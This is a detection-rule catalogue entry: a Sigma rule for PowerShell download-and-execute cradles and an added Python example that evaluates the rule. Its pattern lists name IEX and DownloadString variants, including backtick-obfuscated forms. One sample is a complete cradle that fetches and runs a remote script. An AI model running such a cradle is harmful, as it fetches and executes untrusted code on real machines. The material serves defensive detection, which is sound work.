Techniques
Sample rules
PowerShell Download and Execution Cradles
- source: sigma
- techniques:
  - t1059
Description
Detects PowerShell download and execution cradles.
Detection logic
condition: all of selection_*
selection_download:
    CommandLine|contains:
        - .DownloadString(
        - .DownloadFile(
        - 'Invoke-WebRequest '
        - 'iwr '
selection_iex:
    CommandLine|contains:
        - ;iex $
        - '| IEX'
        - '|IEX '
        - I`E`X
        - I`EX
        - IE`X
        - 'iex '
        - IEX (
        - IEX(
        - Invoke-Expression
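The rule logic above, evaluated against constructed command lines, as an added Python example (not Sigma's or this page's own code). It assumes standard Sigma semantics: `contains` is a case-insensitive substring match, the values in a list are ORed, and `all of selection_*` requires every selection to match. The function names and sample command lines are constructed for illustration.

```python
# Added example: a minimal evaluator for this one rule, not a Sigma backend.
SELECTION_DOWNLOAD = [".DownloadString(", ".DownloadFile(", "Invoke-WebRequest ", "iwr "]
SELECTION_IEX = [";iex $", "| IEX", "|IEX ", "I`E`X", "I`EX", "IE`X",
                 "iex ", "IEX (", "IEX(", "Invoke-Expression"]


def contains_any(command_line, needles):
    """Sigma 'contains' over a value list: case-insensitive substring, OR across values.

    Returns the list of values that matched, so an analyst can see why a line fired.
    """
    haystack = command_line.lower()
    return [n for n in needles if n.lower() in haystack]


def evaluate(command_line):
    """Apply 'all of selection_*': every selection must have at least one hit."""
    result = {
        "selection_download": contains_any(command_line, SELECTION_DOWNLOAD),
        "selection_iex": contains_any(command_line, SELECTION_IEX),
    }
    result["alert"] = bool(result["selection_download"]) and bool(result["selection_iex"])
    return result


# Constructed process-creation command lines (example.invalid is a reserved name).
SAMPLES = [
    # Download and execution together: both selections match, rule fires.
    'powershell -nop -c IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")',
    # Download only (file saved to disk, nothing evaluated): rule stays silent.
    r'powershell -c Invoke-WebRequest -Uri http://example.invalid/report.csv -OutFile C:\Temp\report.csv',
    # Expression evaluation only, no download call: rule stays silent.
    'powershell -c Invoke-Expression $env:BUILD_STEP',
]

if __name__ == "__main__":
    for line in SAMPLES:
        verdict = evaluate(line)
        print("ALERT" if verdict["alert"] else "ok   ", line)
        print("      download:", verdict["selection_download"])
        print("      iex:     ", verdict["selection_iex"])
```

Printing the matched values per selection shows which substring caused each hit, which helps when tuning the rule against legitimate administrative scripts.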